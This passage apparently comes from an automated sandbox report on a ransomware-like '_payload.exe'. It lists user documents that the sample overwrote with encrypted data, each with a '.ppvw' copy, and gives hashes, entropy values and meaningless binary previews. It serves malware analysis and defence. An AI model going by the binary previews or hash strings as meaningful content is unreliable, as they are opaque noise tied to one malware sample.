                                                                                                                          Preview:UMMBD......M0#x....6.r.y.:....8)r.w.].8^.&..A.VY....{.3;.u.>..K.,....?P...N....O..... ..Oa..Y...>...b.0.L|.......%.o...t.{.W........NwO..'.......]{...K.S..>........nK.z].. .n..2..Np.=..4.......o.6+[.....R(..."_8..O3,.g........e.....hec....T2r..........].'...d.*.i?b.6.........%.z...2...}.3G.0..P76...}..K./.&...{.0..r^.,L.TlL..eX1. 7.e.p{...=......r1Y!...J?.......%....W...#.......\<$D....g..........q=X....V...Y..4*6.S..h.b&...a....?....w...K..R...:.V...|.&.t...Y..#J{..P.h..X.....&......w..?...eoP...pG.4.........#..#.2+...;.....s7N.gX..^[.6.a~..E#i.p...P..Fb.M'.}9Li.+n.htt+..!d..Y!qK..T3.5}..5Z...W......qVZ...I...b.`.DU...,..v..........j<..2...gM..Jj^U.I.......P..)....!...D.....N.......s..U...;..`..N..Hc8.5.......=...-.T<..P...zh.y..tr%RB.g.U....B@.x..3.e.=^&...e.....R...Xik.-wOR5a..s..M.....n+.@....."..~.t.n....tY.e}..;...0Y%K.5.Yq..m..Kc............je..D.&-x5'.r+.I....'.;..=a1..G.|..}.....$.z\4.?....{......A..........{o.h...q

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.859643385170734
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:srq4uXb0hX4KG2OewuYv1HSqZ6F6DTTrVg4BQePERqmHlV9oNMJX3+xOfASJ3B0y:srq4uX2XHG2Oe+NX6FiTZdBUFkFuAI5D
                                                                                                                          MD5:797B93C723FD26F4B666F100E43CA010
                                                                                                                          SHA1:FB1A68E05F1FD362982081F5103446E240D33826
                                                                                                                          SHA-256:16E26504A19A0089BFDB7D5FD4A950FDFAD7AF56CD2F485D548318835FD30F0A
                                                                                                                          SHA-512:73A6BA823B57934F0BFD266160EA0F5F4FCC1A448CF3B80CAF904C42D4478E439A9E2505960F28F218B6A30AB19793126D8C8403C9E9964A99BB86EEB6059A0C
                                                                                                                          Malicious:false
                                                                                                                          Preview:UMMBD......M0#x....6.r.y.:....8)r.w.].8^.&..A.VY....{.3;.u.>..K.,....?P...N....O..... ..Oa..Y...>...b.0.L|.......%.o...t.{.W........NwO..'.......]{...K.S..>........nK.z].. .n..2..Np.=..4.......o.6+[.....R(..."_8..O3,.g........e.....hec....T2r..........].'...d.*.i?b.6.........%.z...2...}.3G.0..P76...}..K./.&...{.0..r^.,L.TlL..eX1. 7.e.p{...=......r1Y!...J?.......%....W...#.......\<$D....g..........q=X....V...Y..4*6.S..h.b&...a....?....w...K..R...:.V...|.&.t...Y..#J{..P.h..X.....&......w..?...eoP...pG.4.........#..#.2+...;.....s7N.gX..^[.6.a~..E#i.p...P..Fb.M'.}9Li.+n.htt+..!d..Y!qK..T3.5}..5Z...W......qVZ...I...b.`.DU...,..v..........j<..2...gM..Jj^U.I.......P..)....!...D.....N.......s..U...;..`..N..Hc8.5.......=...-.T<..P...zh.y..tr%RB.g.U....B@.x..3.e.=^&...e.....R...Xik.-wOR5a..s..M.....n+.@....."..~.t.n....tY.e}..;...0Y%K.5.Yq..m..Kc............je..D.&-x5'.r+.I....'.;..=a1..G.|..}.....$.z\4.?....{......A..........{o.h...q

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN\LTKMYBSEYZ.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.846818632132153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1W79dx7u3CxzD3JPGkROax6xy0TCVi+60Nxxs5QWX7tVftjg0bD:1q7pu3+ZGkDf9m0TmttzbD
                                                                                                                          MD5:E2A8D0AB8C458F05BA8796115BE26CC0
                                                                                                                          SHA1:3F492FB0715C6507D0A16B28216B9BF12F3E35BF
                                                                                                                          SHA-256:52023BE90C356CF3CE82FEAC5472E178DF813F5573A0514E7C0DD95E1B2F7ECC
                                                                                                                          SHA-512:D9D40816AC2B0D0F1560A6291C08A9932D4C9373DA51857069D386E76CB871DC197EE466C3EFE0FF8D2098B0AF7C0E11DA006C4E1408565A3D79D18E58D1F6DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..G...m..........3 .o.(TL.z~xA....a..a.J.....1..............Lr.{.#...,V...x....b.P.L.z~dl....)...q...09..Bo..i.,y._.J......".s..40M...}.@...MU.(.r.x|/.J)...\@...,J...E.%6....).j....`....(....O...!.?6..C.f..7..j.~."..rrKy.v...y..o.R....U...W...K.3.E.M.h2.}..29...!.H^..>...sn...:...)vG..g..j.....n@)5......W.V...._..b.....a....A..........T.....:C7f..1r."...p65g...u.Y...m...N....r.+R..9..f.KO.g.6b'X..".B....?<$.je.Au...p?2.&.be$..+./........M.$.x.....3._XS[I=.v.w..<.........E...U[|...a.ND..q V5....%..g.m.@x...N#..x.(.L.9>q.|....@....q.$H....^{.j)w...4.I;..h....x..g..d.`..V..BU...(....?..%.zW..s0$....l#.......NRV.2.X.gl"%..8"u...n..2.Ion.H..\SZ.^.d..N...Y.=UOy@..q......).*?.E...I.!.....2..Nk/..c.........t.=..9r.....K..[o..(...".\#.<...wZ...%..R..3`T.A....g.}..h....C...B.7.a..,.46H.g..H./.H.xXB.<:.l.^..O.....[.$.q....00..)Y8I'!2_...`L.~3T..).-....3....d...3..V1...o...!....V..)Y..j...|yw.`....g,.@..S.|.A....@9)gOnC...*w...%7...x...>

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN\LTKMYBSEYZ.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.846818632132153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1W79dx7u3CxzD3JPGkROax6xy0TCVi+60Nxxs5QWX7tVftjg0bD:1q7pu3+ZGkDf9m0TmttzbD
                                                                                                                          MD5:E2A8D0AB8C458F05BA8796115BE26CC0
                                                                                                                          SHA1:3F492FB0715C6507D0A16B28216B9BF12F3E35BF
                                                                                                                          SHA-256:52023BE90C356CF3CE82FEAC5472E178DF813F5573A0514E7C0DD95E1B2F7ECC
                                                                                                                          SHA-512:D9D40816AC2B0D0F1560A6291C08A9932D4C9373DA51857069D386E76CB871DC197EE466C3EFE0FF8D2098B0AF7C0E11DA006C4E1408565A3D79D18E58D1F6DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..G...m..........3 .o.(TL.z~xA....a..a.J.....1..............Lr.{.#...,V...x....b.P.L.z~dl....)...q...09..Bo..i.,y._.J......".s..40M...}.@...MU.(.r.x|/.J)...\@...,J...E.%6....).j....`....(....O...!.?6..C.f..7..j.~."..rrKy.v...y..o.R....U...W...K.3.E.M.h2.}..29...!.H^..>...sn...:...)vG..g..j.....n@)5......W.V...._..b.....a....A..........T.....:C7f..1r."...p65g...u.Y...m...N....r.+R..9..f.KO.g.6b'X..".B....?<$.je.Au...p?2.&.be$..+./........M.$.x.....3._XS[I=.v.w..<.........E...U[|...a.ND..q V5....%..g.m.@x...N#..x.(.L.9>q.|....@....q.$H....^{.j)w...4.I;..h....x..g..d.`..V..BU...(....?..%.zW..s0$....l#.......NRV.2.X.gl"%..8"u...n..2.Ion.H..\SZ.^.d..N...Y.=UOy@..q......).*?.E...I.!.....2..Nk/..c.........t.=..9r.....K..[o..(...".\#.<...wZ...%..R..3`T.A....g.}..h....C...B.7.a..,.46H.g..H./.H.xXB.<:.l.^..O.....[.$.q....00..)Y8I'!2_...`L.~3T..).-....3....d...3..V1...o...!....V..)Y..j...|yw.`....g,.@..S.|.A....@9)gOnC...*w...%7...x...>

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8634214709044725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NnrMETIeFhLx1QyRwMhnFHD+js2nuzRUU7x7ZZv68cGLoti5lNm984dpWpx8GGzk:RMEsuhY4wMhnVBzhxPSVi5s8+paWGAqv
                                                                                                                          MD5:0445974EA5DB2AFCD379F2FD448F3DC1
                                                                                                                          SHA1:DF8DAEE1FCB27D99A54FB2845E95AE2C5A7E0B28
                                                                                                                          SHA-256:25FEF4A646BD6C5CA3D05E692AE61EC677DA550446CDB73B5A7662DB8F0B1ECC
                                                                                                                          SHA-512:8D138E6A521E173EC099F6E38BEFB84A8453B4D52DCEC599DF39FCDA86445114DF7A77A5EE5CC86D13830D91CC3DDE68CD6C6DE04CC5DF1D193795FD823F369D
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ.G.r...~..[...[Q.G....H7..J.T.$}2.I...NR.y....Q.WH.q.q~m.W..._R...l..f..Y.i.@...?.".&L..u............2.....V....H...Xf.g.h.]v.....B...]<..........V...QYk..u....i?M.V:..pv4.F%..|....U..B.T)..s..(..jJH.U..Jn=..h1b:.H3*.<.L$.1.,....y|..@lx.H?\i.|.}....%..eFG...%B.4..=;.y.....f,....N...u... ,.bDH`...SWC........J!`..?+.....|...9.v.H.H_+.].....be.d*..[......M6...G..&!.U...[^%d\!..<0..Pjx.;T..Y.U.M...#..B.j.Z.@.K6C.....'E..t+...t.w..~.....|.....N...,z1.....o..jH..0...X.4R.x.hu.`L..el.cx..j..;.=R..^...GO).kP...8......A.!.u....F.R..."..*...G...e.r.~`b.nbky......8.4..?H.+....U.3......H.A.2VINWZu.66.{.r.R...L.....ws%O.DtT....CT.....h~."w....;a]c..'...C...q=p...>.Q.PV..C}G2............l9v....<..:..v.Z.%.^/U...t<...7.P...eh.;.?X{..y..H.3:.uk..m<l5.c.t..30.JMX..3.(..w=$S&..?.?......>X.].. ...?...#..._.T..Xs..\`_/.V...1..{.......S.ZF.}...=.A..R.Z^Pxq.x.!8...."....F{.7.x.....d..K.....C..B..8..'..\0..fD..u}...l..*.Zm......n..Sq>K...T.f.....V....'.q..

                                                                                                                          C:\Users\user\Documents\UMMBDNEQBN\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8634214709044725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:NnrMETIeFhLx1QyRwMhnFHD+js2nuzRUU7x7ZZv68cGLoti5lNm984dpWpx8GGzk:RMEsuhY4wMhnVBzhxPSVi5s8+paWGAqv
                                                                                                                          MD5:0445974EA5DB2AFCD379F2FD448F3DC1
                                                                                                                          SHA1:DF8DAEE1FCB27D99A54FB2845E95AE2C5A7E0B28
                                                                                                                          SHA-256:25FEF4A646BD6C5CA3D05E692AE61EC677DA550446CDB73B5A7662DB8F0B1ECC
                                                                                                                          SHA-512:8D138E6A521E173EC099F6E38BEFB84A8453B4D52DCEC599DF39FCDA86445114DF7A77A5EE5CC86D13830D91CC3DDE68CD6C6DE04CC5DF1D193795FD823F369D
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJ.G.r...~..[...[Q.G....H7..J.T.$}2.I...NR.y....Q.WH.q.q~m.W..._R...l..f..Y.i.@...?.".&L..u............2.....V....H...Xf.g.h.]v.....B...]<..........V...QYk..u....i?M.V:..pv4.F%..|....U..B.T)..s..(..jJH.U..Jn=..h1b:.H3*.<.L$.1.,....y|..@lx.H?\i.|.}....%..eFG...%B.4..=;.y.....f,....N...u... ,.bDH`...SWC........J!`..?+.....|...9.v.H.H_+.].....be.d*..[......M6...G..&!.U...[^%d\!..<0..Pjx.;T..Y.U.M...#..B.j.Z.@.K6C.....'E..t+...t.w..~.....|.....N...,z1.....o..jH..0...X.4R.x.hu.`L..el.cx..j..;.=R..^...GO).kP...8......A.!.u....F.R..."..*...G...e.r.~`b.nbky......8.4..?H.+....U.3......H.A.2VINWZu.66.{.r.R...L.....ws%O.DtT....CT.....h~."w....;a]c..'...C...q=p...>.Q.PV..C}G2............l9v....<..:..v.Z.%.^/U...t<...7.P...eh.;.?X{..y..H.3:.uk..m<l5.c.t..30.JMX..3.(..w=$S&..?.?......>X.].. ...?...#..._.T..Xs..\`_/.V...1..{.......S.ZF.}...=.A..R.Z^Pxq.x.!8...."....F{.7.x.....d..K.....C..B..8..'..\0..fD..u}...l..*.Zm......n..Sq>K...T.f.....V....'.q..

                                                                                                                          C:\Users\user\Documents\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.835158116119083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QJbjqr5XCs/NKBYeJQoUh9PuJT2B+bLyaKbI0AKzOnK3zV7F1ObLQGK83taJbD:cb2gEMYZh9u2BS2hbNzOK3zg5japD
                                                                                                                          MD5:9CB2CA47279C81BB6AD88709225C1917
                                                                                                                          SHA1:AA81A056DB1740A71DCED83BC27413E16F4887FF
                                                                                                                          SHA-256:5B82D0A4505E3FED11087C68103900BEFC5A1AB2451B572C38DCAC5B6431D01E
                                                                                                                          SHA-512:4742C4C8B1C6FB712EB46EE176D30845CA0CD477C40CA9263E9D5CBBDC10A11928EFD3C4EF1A1B79FB4C2AB1F6CEF0E47FEB4E44617F22518A4F3D706D45B1AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJz..L,...b...^....t..."...P&.".|...o.}<.....[...9*"....k.1...!....00.W..O.C.2|.....Ct.1..../{)...=.;Y..Wb...,.......@.!..8<dU..']Vr..3.y.&.._....'i.*.ST0..W..Y..:.4=]..A6...y.......<ET.p.,...Q...C`n%z5.8.g.....0.....Gc...t.M....a....B...u.5.../;Z..<..luh.-6k.J.2O../=..I.g...........Qp...i.^.!..Q..........#......f..2.H.T.o.m...oi....uH.#..4u..T.@..eZY..v...../..+.M@.%5#.\.}.'.X.YC.5..$.|...v.... .~..N.8}...v...._.. n...\_.kJ........."...QS,...9.|.(...k..Y.P1....p..,.........`..HR...I.....M'...U...V.B..M..i.1....)<.Kj.=Da....=....P...m/c..G\7...I..i.O....`......po+.....j.Z..c...<".!............(<......`.O...A....7.V.)R.$I..'_.N&.!T.f..I.T...bN...o......f..1.....:.?..6.Q.d.R......S.m..$FG. ..F%.[{+...r.*....y.Oe..0......@7.....',|?.<.|y7<......yDX...=<.'..C.[. .$..Q....g....@.f.......A@,.^a.E./%....N(!..<...zT}.h....e....#}....G..J3@.T.&.W...;u..BH..=ET......a....Q.Jx...B...6;.{s.....VD._|...&..B.1...y.6.$^.[..*^._m..Sp1..v@....i.y.j.o...!:....

                                                                                                                          C:\Users\user\Documents\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.835158116119083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QJbjqr5XCs/NKBYeJQoUh9PuJT2B+bLyaKbI0AKzOnK3zV7F1ObLQGK83taJbD:cb2gEMYZh9u2BS2hbNzOK3zg5japD
                                                                                                                          MD5:9CB2CA47279C81BB6AD88709225C1917
                                                                                                                          SHA1:AA81A056DB1740A71DCED83BC27413E16F4887FF
                                                                                                                          SHA-256:5B82D0A4505E3FED11087C68103900BEFC5A1AB2451B572C38DCAC5B6431D01E
                                                                                                                          SHA-512:4742C4C8B1C6FB712EB46EE176D30845CA0CD477C40CA9263E9D5CBBDC10A11928EFD3C4EF1A1B79FB4C2AB1F6CEF0E47FEB4E44617F22518A4F3D706D45B1AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJz..L,...b...^....t..."...P&.".|...o.}<.....[...9*"....k.1...!....00.W..O.C.2|.....Ct.1..../{)...=.;Y..Wb...,.......@.!..8<dU..']Vr..3.y.&.._....'i.*.ST0..W..Y..:.4=]..A6...y.......<ET.p.,...Q...C`n%z5.8.g.....0.....Gc...t.M....a....B...u.5.../;Z..<..luh.-6k.J.2O../=..I.g...........Qp...i.^.!..Q..........#......f..2.H.T.o.m...oi....uH.#..4u..T.@..eZY..v...../..+.M@.%5#.\.}.'.X.YC.5..$.|...v.... .~..N.8}...v...._.. n...\_.kJ........."...QS,...9.|.(...k..Y.P1....p..,.........`..HR...I.....M'...U...V.B..M..i.1....)<.Kj.=Da....=....P...m/c..G\7...I..i.O....`......po+.....j.Z..c...<".!............(<......`.O...A....7.V.)R.$I..'_.N&.!T.f..I.T...bN...o......f..1.....:.?..6.Q.d.R......S.m..$FG. ..F%.[{+...r.*....y.Oe..0......@7.....',|?.<.|y7<......yDX...=<.'..C.[. .$..Q....g....@.f.......A@,.^a.E./%....N(!..<...zT}.h....e....#}....G..J3@.T.&.W...;u..BH..=ET......a....Q.Jx...B...6;.{s.....VD._|...&..B.1...y.6.$^.[..*^._m..Sp1..v@....i.y.j.o...!:....

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851920553279267
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:kz3hUZQcPPc8orpRAL/EPpoE0Rkar833UkvcDLeDJe0nm8Y7XaJ+bD:kzRwPboVRALceE0RxG3U6YLeXmva8D
                                                                                                                          MD5:3439D7BEA6682582717289F4471DD067
                                                                                                                          SHA1:206EDD2A39B4034C5853895F8D4E4F7BA0A83DEF
                                                                                                                          SHA-256:240CDE5E95DC8AD87099B44A25396F990AFE04E1963BB3E3EC963D57B7FAFE1D
                                                                                                                          SHA-512:00C9AEFF24F5A2FE7921BAC4A4E26217633659456DC3816C285E02404D528145448DA34E1676964B81D54876915DDB226018283567B36B04755658CC80F60992
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.......0v.z.r.-.9:D.CgD..8T...Qa...p4....&..F.TZE.7F....*.......K...pa....L....L...1.U..c.I..s.Mr9..U..#.kN.K=..]p<..u.XSj...3t..\4..vHj/..k....n.p..f.Ik..h."..`%......."....-......p...F.V.(......#...3.6f..C<...$.q........^`3...7..;.....Z.t.P2.,...n.I.d.....O....m..:.A'_..t...V.h.j...aP....i..,.g.L..6.B...u.`.}...F.a...&c.qg....fs....a..&J=p%B......"....h...V..S..aQ..m..0*E/!.g...y.../.t.......U&..Q(...4B.FQ.2.a...(..W.A.>..J.....4.....-....:..C01..w..?J.W!......q....Gb.>@P)...4W..H...2.}.D...$....K..>..$...O..y^pa.0.6.adcG.....<......K...\.I..a).F..'2.p..zt..am.L]....e..k..rc`...U1..e.....whU.xu.?.............y...m..{.}C`...(.Q..2.i...H[..b.Aq.CF.Q..^.....zu..26....z2LH..L..!:.j.{.I3.=XM=o..Ef.....r......B..U.Z......(. $."%_..e..Z.e+.S.=..|2<_|.7./...7p..M.....o...;.-.Pk..u=ay.6hW..E<...Y..u8...m1..M..6..=.....$.t.5..B....7H......-..v.6i...........Dl.@.....).^...F..G1-....]*D{..v...r.F..S....-H..p.l..C...*.?....!~F.....l[`....9

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.851920553279267
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:kz3hUZQcPPc8orpRAL/EPpoE0Rkar833UkvcDLeDJe0nm8Y7XaJ+bD:kzRwPboVRALceE0RxG3U6YLeXmva8D
                                                                                                                          MD5:3439D7BEA6682582717289F4471DD067
                                                                                                                          SHA1:206EDD2A39B4034C5853895F8D4E4F7BA0A83DEF
                                                                                                                          SHA-256:240CDE5E95DC8AD87099B44A25396F990AFE04E1963BB3E3EC963D57B7FAFE1D
                                                                                                                          SHA-512:00C9AEFF24F5A2FE7921BAC4A4E26217633659456DC3816C285E02404D528145448DA34E1676964B81D54876915DDB226018283567B36B04755658CC80F60992
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.......0v.z.r.-.9:D.CgD..8T...Qa...p4....&..F.TZE.7F....*.......K...pa....L....L...1.U..c.I..s.Mr9..U..#.kN.K=..]p<..u.XSj...3t..\4..vHj/..k....n.p..f.Ik..h."..`%......."....-......p...F.V.(......#...3.6f..C<...$.q........^`3...7..;.....Z.t.P2.,...n.I.d.....O....m..:.A'_..t...V.h.j...aP....i..,.g.L..6.B...u.`.}...F.a...&c.qg....fs....a..&J=p%B......"....h...V..S..aQ..m..0*E/!.g...y.../.t.......U&..Q(...4B.FQ.2.a...(..W.A.>..J.....4.....-....:..C01..w..?J.W!......q....Gb.>@P)...4W..H...2.}.D...$....K..>..$...O..y^pa.0.6.adcG.....<......K...\.I..a).F..'2.p..zt..am.L]....e..k..rc`...U1..e.....whU.xu.?.............y...m..{.}C`...(.Q..2.i...H[..b.Aq.CF.Q..^.....zu..26....z2LH..L..!:.j.{.I3.=XM=o..Ef.....r......B..U.Z......(. $."%_..e..Z.e+.S.=..|2<_|.7./...7p..M.....o...;.-.Pk..u=ay.6hW..E<...Y..u8...m1..M..6..=.....$.t.5..B....7H......-..v.6i...........Dl.@.....).^...F..G1-....]*D{..v...r.F..S....-H..p.l..C...*.?....!~F.....l[`....9

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\FENIVHOIKN.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8319439863197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:plzYg5D4WhrvIlAKK/UtxJ0w0MJNgO5/pzp3eScFvRuyLqE0+6ZIHbD:7394kvIMbwBfzc1B8dZAD
                                                                                                                          MD5:A7C6F66D1821646C31066489A27830A9
                                                                                                                          SHA1:0520E5A34945A706EF8FA4A7D0617A6FD9F22AD4
                                                                                                                          SHA-256:6430920AC7DAAD59F760F151320B9BB0C892E5CAB578B9980D0EDF3021BCD74B
                                                                                                                          SHA-512:125B617D38AC6685E60A0557E17BDE4DA299E19ECB0DAC1C1315B1FC005A1FF76AEAAD9B8B9B92475718ACA9E8C94966815D4CF0D6EBA83557482D2462A0756D
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV..^....J...cx...)....i".q.U...5O.T47..7Q.W3.6U1..T........{a..<..I!.....G.."]R6.....HnX..n.g..{l._..h...t.U..~.n..k.....x.X.9...r.....T.u..a....,.t5*x.OKC.hlX.7h...P....._..]...M.M!..f..v...a.:a...R..o..r.1.d{:.....J%..^...MHt:f>.u-.o......{z......Bi..N~.x....Y..".ib........(z..x..r.A..w.Q...h......g>..[....>1.a.)]...... ...2u.tJ.q.......t...b%.`..Z..)J....S.b.z_.P...z\...8~..O'w..U..;T". I.g.....F..j.....DD.f._.@..z0.].. ............]/.Y_.{......V...E...GZ.n@W{...;@._....{..H..)N....w.J]...Cl......nC.>b.+2...P.....J..u:C.f..w..|2y....T.1.....?bO..OhKH.3H.z.w....o....7*..j;@6...Sfp..=.X.h..2.[hL.._........._+..T.3.s..E-.....!./..\...|N..^.+.c\.e...~....*..&X....u,..x.W.[6.1..9..h.....i...e...E.q.5..?.Y)W..-..Cf..&..#X].s.......![..k.lu.i, ....^.+.JW7.-CN.[.m.KJ..[..{...a.AKDj.G.\%.UZ-.h...c\.9.o........E...J..u...^T.W.....G7.........~.m.^Qv;'......9..u>..>o.}S..~.5N./..C.L\.2........%..Z.z5......u...........~..T.o.a=.T....y.$

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\FENIVHOIKN.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8319439863197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:plzYg5D4WhrvIlAKK/UtxJ0w0MJNgO5/pzp3eScFvRuyLqE0+6ZIHbD:7394kvIMbwBfzc1B8dZAD
                                                                                                                          MD5:A7C6F66D1821646C31066489A27830A9
                                                                                                                          SHA1:0520E5A34945A706EF8FA4A7D0617A6FD9F22AD4
                                                                                                                          SHA-256:6430920AC7DAAD59F760F151320B9BB0C892E5CAB578B9980D0EDF3021BCD74B
                                                                                                                          SHA-512:125B617D38AC6685E60A0557E17BDE4DA299E19ECB0DAC1C1315B1FC005A1FF76AEAAD9B8B9B92475718ACA9E8C94966815D4CF0D6EBA83557482D2462A0756D
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV..^....J...cx...)....i".q.U...5O.T47..7Q.W3.6U1..T........{a..<..I!.....G.."]R6.....HnX..n.g..{l._..h...t.U..~.n..k.....x.X.9...r.....T.u..a....,.t5*x.OKC.hlX.7h...P....._..]...M.M!..f..v...a.:a...R..o..r.1.d{:.....J%..^...MHt:f>.u-.o......{z......Bi..N~.x....Y..".ib........(z..x..r.A..w.Q...h......g>..[....>1.a.)]...... ...2u.tJ.q.......t...b%.`..Z..)J....S.b.z_.P...z\...8~..O'w..U..;T". I.g.....F..j.....DD.f._.@..z0.].. ............]/.Y_.{......V...E...GZ.n@W{...;@._....{..H..)N....w.J]...Cl......nC.>b.+2...P.....J..u:C.f..w..|2y....T.1.....?bO..OhKH.3H.z.w....o....7*..j;@6...Sfp..=.X.h..2.[hL.._........._+..T.3.s..E-.....!./..\...|N..^.+.c\.e...~....*..&X....u,..x.W.[6.1..9..h.....i...e...E.q.5..?.Y)W..-..Cf..&..#X].s.......![..k.lu.i, ....^.+.JW7.-CN.[.m.KJ..[..{...a.AKDj.G.\%.UZ-.h...c\.9.o........E...J..u...^T.W.....G7.........~.m.^Qv;'......9..u>..>o.}S..~.5N./..C.L\.2........%..Z.z5......u...........~..T.o.a=.T....y.$

                                                                                                                          C:\Users\user\Documents\VLZDGUKUTZ\KZWFNRXYKI.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8504677375369845
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:pxRzHxCPfemaMy2LCQzP5xxW0A4rSpoFB8qug8yEPjKyockI9lbD:pfHxCP2maMyiCIP5xxW0A4rkoFSqug89
                                                                                                                          MD5:D6E296911A66720283DFF5138FADCEFF
                                                                                                                          SHA1:4DF766A230ACFA2138FC8EA7197185D9202ACAC5
                                                                                                                          SHA-256:9EF996E68381C150722EBACE8A3FCFFE6F4583C4F2EC1923A55454D908372E01
                                                                                                                          SHA-512:8894A5D9E50175C08A0085652B77461A8272597D0D9A2C52AC62DEA304642EBDFF5D8F562EEAFCFA7DF3DBEA5CB8537B38D78A9621FC8F33913D737ABD3662C2
                                                                                                                          Malicious:false
